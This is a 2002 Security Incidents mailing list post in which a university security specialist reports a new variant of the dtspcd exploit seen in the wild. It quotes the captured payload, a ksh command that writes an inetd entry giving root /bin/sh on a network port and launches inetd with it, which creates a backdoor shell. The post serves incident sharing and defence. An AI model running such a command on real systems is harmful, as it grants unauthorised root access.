Security Incidents mailing list archives

variation of the dtspcd exploit?

From: "Nathan W. Labadie" <ab0781 () wayne edu>
Date: Thu, 14 Feb 2002 16:07:10 -0500

Until last week, all the dtspcd exploits I'd seen had been the same
(inetd, ingreslock, /tmp/x, etc). Looks like there is a new one floating
around.  The ASCII output looks something like this:

/bin/ksh -c echo 'rje stream tcp nowait root /bin/sh sh -i'> /tmp/z;
/usr/sbin/inetd -s /tmp/z;
sleep 10;

A copy of the capture can be downloaded from here:
http://security.wayne.edu/downloads/dtspcd-1.cap

-- 
Nathan W. Labadie       | ab0781 () wayne edu   
Sr. Security Specialist | 313/577.2126
Wayne State University  | 313/577.1338 fax
C&IT Information Security Office: http://security.wayne.edu

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Current thread:

variation of the dtspcd exploit? Nathan W. Labadie (Feb 14)
- Re: variation of the dtspcd exploit? Valdis . Kletnieks (Feb 15)